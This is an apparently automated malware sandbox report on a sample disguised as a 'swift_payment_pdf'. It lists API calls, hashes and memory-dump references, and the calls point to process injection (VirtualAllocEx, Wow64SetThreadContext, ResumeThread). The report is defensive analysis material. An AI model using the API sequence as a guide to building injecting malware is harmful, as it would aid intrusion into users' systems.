                  • Instruction Fuzzy Hash: 91216AB5D003098FDB10DFAAC8857EEBBF5EF48324F548429D459A7242CB78A945CFA1
                  APIs
                  • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 04ED96F0
                  Memory Dump Source
                  • Source File: 00000000.00000002.1914752604.0000000004ED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04ED0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_4ed0000_swift_payment_pdf.jbxd
                  Similarity
                  • API ID: MemoryProcessRead
                  • String ID:
                  • API String ID: 1726664587-0
                  • Opcode ID: ac9bb90d791d798527c665cce62459afe4dc9b30b38040c2b02048fad7f4cd49
                  • Instruction ID: 5cbf19d8c37a2bac303e0e6033bc3395722f24aee49b885e82205134dfc3499e
                  • Opcode Fuzzy Hash: ac9bb90d791d798527c665cce62459afe4dc9b30b38040c2b02048fad7f4cd49
                  • Instruction Fuzzy Hash: 902159B1C003499FCB10DFAAC881ADEFBF5FF48310F108429E559A3241C734A900CBA1

                  Control-flow Graph (rendered graph not reproduced; the function calls Wow64SetThreadContext)
                  APIs
                  • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 04ED9466
                  Memory Dump Source
                  • Source File: 00000000.00000002.1914752604.0000000004ED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04ED0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_4ed0000_swift_payment_pdf.jbxd
                  Similarity
                  • API ID: ContextThreadWow64
                  • String ID:
                  • API String ID: 983334009-0
                  • Opcode ID: c04c6ddc374e5bd6cfa796f67a5f404129fe2cf835203abd2add36edab912642
                  • Instruction ID: 41df77503d7ea02f9acf530dd026a449f1151fd0a87869e87bd44f791ffc586b
                  • Opcode Fuzzy Hash: c04c6ddc374e5bd6cfa796f67a5f404129fe2cf835203abd2add36edab912642
                  • Instruction Fuzzy Hash: 5C2138B59003098FDB10DFAAC8857EEBBF4EF48324F148429D559A7242CB78A945CFA5
                  APIs
                  • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 014CD717
                  Memory Dump Source
                  • Source File: 00000000.00000002.1912228458.00000000014C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014C0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_14c0000_swift_payment_pdf.jbxd
                  Similarity
                  • API ID: DuplicateHandle
                  • String ID:
                  • API String ID: 3793708945-0
                  • Opcode ID: cd909dcba9909e6854f18c963cec9822541b11476ab4483af1613cc29955cd7e
                  • Instruction ID: 7f47fc21f002bbc3c2e3bbaf161e006ae1b47272e64392b2e531123baeb38f65
                  • Opcode Fuzzy Hash: cd909dcba9909e6854f18c963cec9822541b11476ab4483af1613cc29955cd7e
                  • Instruction Fuzzy Hash: DD21E3B99002489FDB10CF9AD984ADEBBF4EB48310F14801AE958A3351C374A954CFA1
                  APIs
                  • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 014CD717
                  Memory Dump Source
                  • Source File: 00000000.00000002.1912228458.00000000014C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014C0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_14c0000_swift_payment_pdf.jbxd
                  Similarity
                  • API ID: DuplicateHandle
                  • String ID:
                  • API String ID: 3793708945-0
                  • Opcode ID: 032e55bd7b68bf1a165cab0261066882e9ca9f3724bff74eeca8dd274acbd509
                  • Instruction ID: 837808d4216625f4520a809ad08084825ce043a2734692b684ce3941c18fc664
                  • Opcode Fuzzy Hash: 032e55bd7b68bf1a165cab0261066882e9ca9f3724bff74eeca8dd274acbd509
                  • Instruction Fuzzy Hash: 9C21E0B9900248DFDB10CFA9D984ADEBBF5EB48314F14842AE958A3251C378A954CFA1
                  APIs
                  • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 04ED952E
                  Memory Dump Source
                  • Source File: 00000000.00000002.1914752604.0000000004ED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04ED0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_4ed0000_swift_payment_pdf.jbxd
                  Similarity
                  • API ID: AllocVirtual
                  • String ID:
                  • API String ID: 4275171209-0
                  • Opcode ID: 3125a67738d5b92859507355875efa8669944d8c90657fcc7468d84600da9b5f
                  • Instruction ID: f00842e3f4174be73f8277d87ddcfb631e5d170c6b049d976f8532eab3e12f11
                  • Opcode Fuzzy Hash: 3125a67738d5b92859507355875efa8669944d8c90657fcc7468d84600da9b5f
                  • Instruction Fuzzy Hash: AE1186B69003099FCB10DFAAD845AEFBFF5EF88320F108419E519A7240CB35A945CBA1
                  APIs
                  • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,014CB079,00000800,00000000,00000000), ref: 014CB28A
                  Memory Dump Source
                  • Source File: 00000000.00000002.1912228458.00000000014C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014C0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_14c0000_swift_payment_pdf.jbxd
                  Similarity
                  • API ID: LibraryLoad
                  • String ID:
                  • API String ID: 1029625771-0
                  • Opcode ID: d3b46b7759051dfed7ff73e6ead6386e55e0045d0ac8cc4fca725bff4f6857af
                  • Instruction ID: 84f69a989d41fd6ffdcd58d5c7f3947d2eeaa8aa9ce084de011524e7f588d3bf
                  • Opcode Fuzzy Hash: d3b46b7759051dfed7ff73e6ead6386e55e0045d0ac8cc4fca725bff4f6857af
                  • Instruction Fuzzy Hash: 301114BA9003098FDB10DF9AD449A9EFBF5EB48710F10842ED559A7310C375A945CFA5
                  APIs
                  • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,014CB079,00000800,00000000,00000000), ref: 014CB28A
                  Memory Dump Source
                  • Source File: 00000000.00000002.1912228458.00000000014C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014C0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_14c0000_swift_payment_pdf.jbxd
                  Similarity
                  • API ID: LibraryLoad
                  • String ID:
                  • API String ID: 1029625771-0
                  • Opcode ID: 87e65a83dcde02a10e020842a3557c5aec3355729adaa85b24d048d9b3be5b18
                  • Instruction ID: a9e4c8394f08458544c050c8ae23fdbaf86945dcc3e226fca4de2af12c9a86fe
                  • Opcode Fuzzy Hash: 87e65a83dcde02a10e020842a3557c5aec3355729adaa85b24d048d9b3be5b18
                  • Instruction Fuzzy Hash: 9B1153BA8003088FDB10CFAAC888ADEFBF5EB88310F14802ED559A7310C375A545CFA4
                  APIs
                  Memory Dump Source
                  • Source File: 00000000.00000002.1914752604.0000000004ED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04ED0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_4ed0000_swift_payment_pdf.jbxd
                  Similarity
                  • API ID: ResumeThread
                  • String ID:
                  • API String ID: 947044025-0
                  • Opcode ID: ac22efaf04a59c66e9b43ecb19cf06fcaaced8c0c7068a43e1cafab854aadb40
                  • Instruction ID: c0a9a17b42f597ea53b1576539792cd45e4bca028584b39a9e1112acd65a1462
                  • Opcode Fuzzy Hash: ac22efaf04a59c66e9b43ecb19cf06fcaaced8c0c7068a43e1cafab854aadb40
                  • Instruction Fuzzy Hash: A8118BB5D003488FDB10EFAAC8457DFFBF5EB88324F108419D069A7280CB35A945CBA5
                  APIs
                  • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 04ED952E
                  Memory Dump Source
                  • Source File: 00000000.00000002.1914752604.0000000004ED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04ED0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_4ed0000_swift_payment_pdf.jbxd
                  Similarity
                  • API ID: AllocVirtual
                  • String ID:
                  • API String ID: 4275171209-0
                  • Opcode ID: 74c5585ab3d795cc354ad2066e5fdaba9272eaf3668aebf69902fe01f6cff112
                  • Instruction ID: fbae26d458df20df961efe76282b0694cb5b29e068f91653d2777f56bba8435e
                  • Opcode Fuzzy Hash: 74c5585ab3d795cc354ad2066e5fdaba9272eaf3668aebf69902fe01f6cff112
                  • Instruction Fuzzy Hash: 411167B59003089FCB10DFAAC845ADFBFF5EF88324F148419E519A7250C735A940CFA1
                  APIs
                  Memory Dump Source
                  • Source File: 00000000.00000002.1914752604.0000000004ED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04ED0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_4ed0000_swift_payment_pdf.jbxd
                  Similarity
                  • API ID: ResumeThread
                  • String ID:
                  • API String ID: 947044025-0
                  • Opcode ID: e61b0f19ed476211393e83d46cc7387d367574a8ff3116a137485f2c36415544
                  • Instruction ID: 34c8a4e3f78e93bd581e88ddaa3e45759ef707fdf5a0e6a24062928fd4f36d17
                  • Opcode Fuzzy Hash: e61b0f19ed476211393e83d46cc7387d367574a8ff3116a137485f2c36415544
                  • Instruction Fuzzy Hash: 981166B59003488FDB24EFAAC8457EFFBF5EB88324F248419D459A7240CB34A944CBA5
                  APIs
                  • PostMessageW.USER32(?,00000010,00000000,?), ref: 04EDBA45
                  Memory Dump Source
                  • Source File: 00000000.00000002.1914752604.0000000004ED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04ED0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_4ed0000_swift_payment_pdf.jbxd
                  Similarity
                  • API ID: MessagePost
                  • String ID:
                  • API String ID: 410705778-0
                  • Opcode ID: 2786a727fadb2a1342a6585aee78a3340f95fe24d35392e70aab38125f678e3a
                  • Instruction ID: 149f4a8d664a4f28f55d93227bc0a3872922fa66c7857ae1ab670174592618e1
                  • Opcode Fuzzy Hash: 2786a727fadb2a1342a6585aee78a3340f95fe24d35392e70aab38125f678e3a
                  • Instruction Fuzzy Hash: AE11F2B98003489FDB10DF9AD885BDEFBF8EB48324F10841AE558A7601D375AA44CFA1
                  APIs
                  • GetModuleHandleW.KERNELBASE(00000000), ref: 014CAFFE
                  Memory Dump Source
                  • Source File: 00000000.00000002.1912228458.00000000014C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014C0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_14c0000_swift_payment_pdf.jbxd
                  Similarity
                  • API ID: HandleModule
                  • String ID:
                  • API String ID: 4139908857-0
                  • Opcode ID: 8874819ed49d6912315605c65d8bd7f062cd6a2b877e2919bc76642592048ef1
                  • Instruction ID: 17602cd2c6d915714d31e39c0ba15d3813c893cfadf6d3f5f34b53130b3e3ecc
                  • Opcode Fuzzy Hash: 8874819ed49d6912315605c65d8bd7f062cd6a2b877e2919bc76642592048ef1
                  • Instruction Fuzzy Hash: D21110B9C003498FDB24DF9AD844ADEFBF4EB88324F10841AD529A7310D375A545CFA1
                  APIs
                  • PostMessageW.USER32(?,00000010,00000000,?), ref: 04EDBA45
                  Memory Dump Source
                  • Source File: 00000000.00000002.1914752604.0000000004ED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04ED0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_4ed0000_swift_payment_pdf.jbxd
                  Similarity
                  • API ID: MessagePost
                  • String ID:
                  • API String ID: 410705778-0
                  • Opcode ID: b568104e60883a8908db6c4962e2856431fb1a562b0442a03b669466d114e46c
                  • Instruction ID: 9b3a2c2e62fd269d773386d221008acb69b55f3e9ff8d5869afc5f8f155b570d
                  • Opcode Fuzzy Hash: b568104e60883a8908db6c4962e2856431fb1a562b0442a03b669466d114e46c
                  • Instruction Fuzzy Hash: 2611F2B58003489FDB10DF9AC889BDEBBF8EB48324F10841AE958A7301D375A944CFA1
                  Memory Dump Source
                  • Source File: 00000000.00000002.1912028913.000000000146D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0146D000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_146d000_swift_payment_pdf.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: d53a1ca04de1113ec52332086e575b54446f16da07c36f205c38d672500ab2e9
                  • Instruction ID: bdec4b874b0ce9ffc21aaca895548b3f3db314bb0ffccb2688d2b4615949c6b7
                  • Opcode Fuzzy Hash: d53a1ca04de1113ec52332086e575b54446f16da07c36f205c38d672500ab2e9
                  • Instruction Fuzzy Hash: F621F471A04240DFDB05DF58D9C0B26BF69FB8831CF24C56AD9490A766C336D816C6A2
                  Memory Dump Source
                  • Source File: 00000000.00000002.1912028913.000000000146D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0146D000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_146d000_swift_payment_pdf.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: c2474df5a99daab420ee4d03639b20be7365290aef235e36a8a7769cc2ea38ab
                  • Instruction ID: 79e8a9094c6fe6e5a7973b3f35042d01854c0aa161920c45ba7aea983fddba8b
                  • Opcode Fuzzy Hash: c2474df5a99daab420ee4d03639b20be7365290aef235e36a8a7769cc2ea38ab
                  • Instruction Fuzzy Hash: B2212771A00244DFDB05DF44C9C0B56BF69FB98328F24C57AD94A0B366C336E856CAA2
                  Memory Dump Source
                  • Source File: 00000000.00000002.1912069753.000000000147D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0147D000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_147d000_swift_payment_pdf.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 5f07945ce9379632b0e21d08fef7925bc53684bf1e61e5990f1ee599f3ab8d96
                  • Instruction ID: 2734351cc54fa3513db264c1368ca8f1612d40ccfeaf775b8f45e69368e0ec1f
                  • Opcode Fuzzy Hash: 5f07945ce9379632b0e21d08fef7925bc53684bf1e61e5990f1ee599f3ab8d96
                  • Instruction Fuzzy Hash: BC21F571A14200EFDB05DF98D9C4B66BBA5FF84324F24CA6ED90A4B362C336D407CA61
                  Memory Dump Source
                  • Source File: 00000000.00000002.1912069753.000000000147D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0147D000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_147d000_swift_payment_pdf.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 6b9856f31ca6ea1d6e85a50bf45b1be7814fe512f0f7c333faa550d381dff17d
                  • Instruction ID: 62d1ec192a5d50919074a4b4727392a3c7462371f45bfc2b479c021d9cca4cbd
                  • Opcode Fuzzy Hash: 6b9856f31ca6ea1d6e85a50bf45b1be7814fe512f0f7c333faa550d381dff17d
                  • Instruction Fuzzy Hash: D62125B5A04280DFCB16DF58D9C4B56BBA5FF84318F24C56ED90A0B366C336D407CA61
                  Memory Dump Source
                  • Source File: 00000000.00000002.1912069753.000000000147D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0147D000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_147d000_swift_payment_pdf.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 170938223c415421a8dcddc5df810cea5f761d8ac959fce4440da526d7ad42a4
                  • Instruction ID: 51da3d625a20e9dbc128c5b4d578d9dfec60786e4a697f92f35ef1dec007b03e
                  • Opcode Fuzzy Hash: 170938223c415421a8dcddc5df810cea5f761d8ac959fce4440da526d7ad42a4
                  • Instruction Fuzzy Hash: 52217F755093C08FDB03CF24D994756BF71EF46218F28C5DAD8498B6A7C33A980ACB62
                  Memory Dump Source
                  • Source File: 00000000.00000002.1912028913.000000000146D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0146D000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_146d000_swift_payment_pdf.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 3d7739f24a7f613363dc0741c1dd4920fb0d2c4cd1d09143030fc2081c46ff73
                  • Instruction ID: 4f691a3eefcbdcca6220172678988635ddedad895ef3143e1c9f1a3cf52f5f81
                  • Opcode Fuzzy Hash: 3d7739f24a7f613363dc0741c1dd4920fb0d2c4cd1d09143030fc2081c46ff73
                  • Instruction Fuzzy Hash: 8311D276904240CFDB02CF44D5C4B56BF71FB84324F24C2AAD9490B266C33AD856CB92
                  Memory Dump Source
                  • Source File: 00000000.00000002.1912028913.000000000146D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0146D000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_146d000_swift_payment_pdf.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 3d7739f24a7f613363dc0741c1dd4920fb0d2c4cd1d09143030fc2081c46ff73
                  • Instruction ID: b499a477ee8621ccb7e537da6caedb5ea5629223c3f331c91fb9ed25aad9c0a2
                  • Opcode Fuzzy Hash: 3d7739f24a7f613363dc0741c1dd4920fb0d2c4cd1d09143030fc2081c46ff73
                  • Instruction Fuzzy Hash: 5F11B476A04280CFDB16CF54D5C4B16BF71FB84328F24C5AAD9450B666C336D456CB92
                  Memory Dump Source
                  • Source File: 00000000.00000002.1912069753.000000000147D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0147D000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_147d000_swift_payment_pdf.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 5bc96cb8dbab4a459d35c79ebbe5ba2a9dff6c5f08df11ade35b896c854f64ae
                  • Instruction ID: 73ae22f2662ffe5cbe09670657bf277852219c176937d501dbdea5e8fde94a77
                  • Opcode Fuzzy Hash: 5bc96cb8dbab4a459d35c79ebbe5ba2a9dff6c5f08df11ade35b896c854f64ae
                  • Instruction Fuzzy Hash: ED11A975904280DFDB12CF54C5C4B16BBA2FB84224F28C6AAD8494B3A6C33AD40ACB61
                  Memory Dump Source
                  • Source File: 00000000.00000002.1912028913.000000000146D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0146D000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_146d000_swift_payment_pdf.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: de02a871aff880d44ba4b8c068c536f37b9a70965ecadc7e9051a11bd5eeec35
                  • Instruction ID: e91c00393f312239882c21c21633c500fe9375797f40f17496613ca1c244252e
                  • Opcode Fuzzy Hash: de02a871aff880d44ba4b8c068c536f37b9a70965ecadc7e9051a11bd5eeec35
                  • Instruction Fuzzy Hash: E901FC716043849AE7104A59CCC4727BFDCDF5132AF18C41BED490A396C73D9840C673
                  Memory Dump Source
                  • Source File: 00000000.00000002.1912028913.000000000146D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0146D000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_146d000_swift_payment_pdf.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: a533e4a73d93e95c0f1ce1cdca7767d36a732e6a22eb74181d6822cc0d0f9707
                  • Instruction ID: 4e0c366cd4ee15904b3fe6987870ad179f7afa64868ee2e59563b5be788d774d
                  • Opcode Fuzzy Hash: a533e4a73d93e95c0f1ce1cdca7767d36a732e6a22eb74181d6822cc0d0f9707
                  • Instruction Fuzzy Hash: 49F0AF715043849EE7218E0ACC84B63FFA8EF50629F18C45AED484A297C279A840CAA2
                  Memory Dump Source
                  • Source File: 00000000.00000002.1914752604.0000000004ED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04ED0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_4ed0000_swift_payment_pdf.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 765edc6547018ff9ae1e81686a7ffc2fad59573ef94171d3d8c149b8056ad3e3
                  • Instruction ID: d52976d75a4a2dd465e589e741389045ce2df3bebc762cf77aee9a87edafd013
                  • Opcode Fuzzy Hash: 765edc6547018ff9ae1e81686a7ffc2fad59573ef94171d3d8c149b8056ad3e3
                  • Instruction Fuzzy Hash: 89C1DE717016048FEB19DB76C850BAAB7FAAFC8744F2454AED1468B2A0DF35E802CB51
                  Memory Dump Source
                  • Source File: 00000000.00000002.1914752604.0000000004ED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04ED0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_4ed0000_swift_payment_pdf.jbxd

                  Execution Graph

                  Execution Coverage:1.1%
                  Dynamic/Decrypted Code Coverage:5%
                  Signature Coverage:7.8%
                  Total number of Nodes:141
                  Total number of Limit Nodes:8

                  Control-flow Graph

                  • Graph of 417a13-417a8d (blocks marked executed / not executed); calls 42e0d3, 42e5f3, 42e893, 42caa3 and LdrLoadDll
                  APIs
                  • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 00417A85
                  Memory Dump Source
                  • Source File: 00000005.00000002.2253099345.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_400000_swift_payment_pdf.jbxd
                  Similarity
                  • API ID: Load
                  • String ID:
                  • API String ID: 2234796835-0

                  Control-flow Graph

                  • Graph of 42b4f3-42b52f (single block); calls 4048c3, 42c5a3 and NtClose
                  Memory Dump Source
                  • Source File: 00000005.00000002.2253099345.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_400000_swift_payment_pdf.jbxd
                  Similarity
                  • API ID: Close
                  • String ID:
                  • API String ID: 3535843008-0
                  Memory Dump Source
                  • Source File: 00000005.00000002.2253655752.0000000001320000.00000040.00001000.00020000.00000000.sdmp, Offset: 01320000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_1320000_swift_payment_pdf.jbxd
                  Similarity
                  • API ID: InitializeThunk
                  • String ID:
                  • API String ID: 2994545307-0

                  Control-flow Graph

                  • Graph of 413f6f-414163 (blocks marked executed / not executed); calls 404833, 424773 and PostThreadMessageW
                  APIs
                  • PostThreadMessageW.USER32(782yF2SJ,00000111,00000000,00000000), ref: 0041414A
                  Memory Dump Source
                  • Source File: 00000005.00000002.2253099345.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_400000_swift_payment_pdf.jbxd
                  Similarity
                  • API ID: MessagePostThread
                  • String ID: 782yF2SJ$782yF2SJ
                  • API String ID: 1836367815-398769369

                  Control-flow Graph

                  • Graph of 42b863-42b8a4 (single block); calls 4048c3, 42c5a3 and RtlFreeHeap
                  APIs
                  • RtlFreeHeap.NTDLL(00000000,00000004,00000000,74C08500,00000007,00000000,00000004,00000000,004172EF,000000F4,?,?,?,?,?), ref: 0042B89F
                  Memory Dump Source
                  • Source File: 00000005.00000002.2253099345.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_400000_swift_payment_pdf.jbxd
                  Similarity
                  • API ID: FreeHeap
                  • String ID:
                  • API String ID: 3298025750-0

                  Control-flow Graph

                  • Graph of 42b813-42b857 (single block); calls 4048c3, 42c5a3 and RtlAllocateHeap
                  APIs
                  • RtlAllocateHeap.NTDLL(?,0041E1BB,?,?,00000000,?,0041E1BB,?,?,?), ref: 0042B852
                  Memory Dump Source
                  • Source File: 00000005.00000002.2253099345.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_400000_swift_payment_pdf.jbxd
                  Similarity
                  • API ID: AllocateHeap
                  • String ID:
                  • API String ID: 1279760036-0

                  Control-flow Graph

                  • Graph of 42b8b3-42b8ec (single block); calls 4048c3, 42c5a3 and ExitProcess
                  APIs
                  • ExitProcess.KERNEL32(?,00000000,?,?,3837F854,?,?,3837F854), ref: 0042B8E7
                  Memory Dump Source
                  • Source File: 00000005.00000002.2253099345.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_400000_swift_payment_pdf.jbxd
                  Similarity
                  • API ID: ExitProcess
                  • String ID:
                  • API String ID: 621844428-0

                  Control-flow Graph

                  • Graph of 1392c0a-1392c26 (blocks marked executed / not executed); one branch calls LdrInitializeThunk
                  Memory Dump Source
                  • Source File: 00000005.00000002.2253655752.0000000001320000.00000040.00001000.00020000.00000000.sdmp, Offset: 01320000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_1320000_swift_payment_pdf.jbxd
                  Similarity
                  • API ID: InitializeThunk
                  • String ID:
                  • API String ID: 2994545307-0
                  Memory Dump Source
                  • Source File: 00000005.00000002.2253655752.0000000001320000.00000040.00001000.00020000.00000000.sdmp, Offset: 01320000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_1320000_swift_payment_pdf.jbxd
                  Similarity
                  • API ID:
                  • String ID: @$@$CFGOptions$DisableExceptionChainValidation$DisableHeapLookaside$ExecuteOptions$FrontEndHeapDebugOptions$GlobalFlag$GlobalFlag2$Initializing the application verifier package failed with status 0x%08lx$LdrpInitializeExecutionOptions$MaxDeadActivationContexts$MaxLoaderThreads$MinimumStackCommitInBytes$RaiseExceptionOnPossibleDeadlock$ShutdownFlags$TracingFlags$UnloadEventTraceDepth$UseImpersonatedDeviceMap$minkernel\ntdll\ldrinit.c
                  • API String ID: 0-2160512332
                  Strings
                  • Invalid debug info address of this critical section, xrefs: 013C54B6
                  • Critical section address, xrefs: 013C5425, 013C54BC, 013C5534
                  • Thread identifier, xrefs: 013C553A
                  • corrupted critical section, xrefs: 013C54C2
                  • First initialization stack trace. Use dps to dump it if non-NULL., xrefs: 013C54E2
                  • Thread is in a state in which it cannot own a critical section, xrefs: 013C5543
                  • Address of the debug info found in the active list., xrefs: 013C54AE, 013C54FA
                  • Critical section address., xrefs: 013C5502
                  • Critical section debug info address, xrefs: 013C541F, 013C552E
                  • double initialized or corrupted critical section, xrefs: 013C5508
                  • undeleted critical section in freed memory, xrefs: 013C542B
                  • Second initialization stack trace. Use dps to dump it if non-NULL., xrefs: 013C54CE
                  • 8, xrefs: 013C52E3
                  • Initialization stack trace. Use dps to dump it if non-NULL., xrefs: 013C540A, 013C5496, 013C5519
                  Memory Dump Source
                  • Source File: 00000005.00000002.2253655752.0000000001320000.00000040.00001000.00020000.00000000.sdmp, Offset: 01320000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_1320000_swift_payment_pdf.jbxd
                  Similarity
                  • API ID:
                  • String ID: 8$Address of the debug info found in the active list.$Critical section address$Critical section address.$Critical section debug info address$First initialization stack trace. Use dps to dump it if non-NULL.$Initialization stack trace. Use dps to dump it if non-NULL.$Invalid debug info address of this critical section$Second initialization stack trace. Use dps to dump it if non-NULL.$Thread identifier$Thread is in a state in which it cannot own a critical section$corrupted critical section$double initialized or corrupted critical section$undeleted critical section in freed memory
                  • API String ID: 0-2368682639
                  Strings
                  • SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx, xrefs: 013C2624
                  • SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries, xrefs: 013C24C0
                  • SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx, xrefs: 013C2498
                  • SXS: Attempt to translate DOS path name "%S" to NT format failed, xrefs: 013C2506
                  • SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx, xrefs: 013C25EB
                  • SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx, xrefs: 013C2412
                  • SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx, xrefs: 013C2602
                  • SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p, xrefs: 013C22E4
                  • RtlpResolveAssemblyStorageMapEntry, xrefs: 013C261F
                  • SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx, xrefs: 013C2409
                  • @, xrefs: 013C259B
                  Memory Dump Source
                  • Source File: 00000005.00000002.2253655752.0000000001320000.00000040.00001000.00020000.00000000.sdmp, Offset: 01320000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_1320000_swift_payment_pdf.jbxd
                  Similarity
                  • API ID:
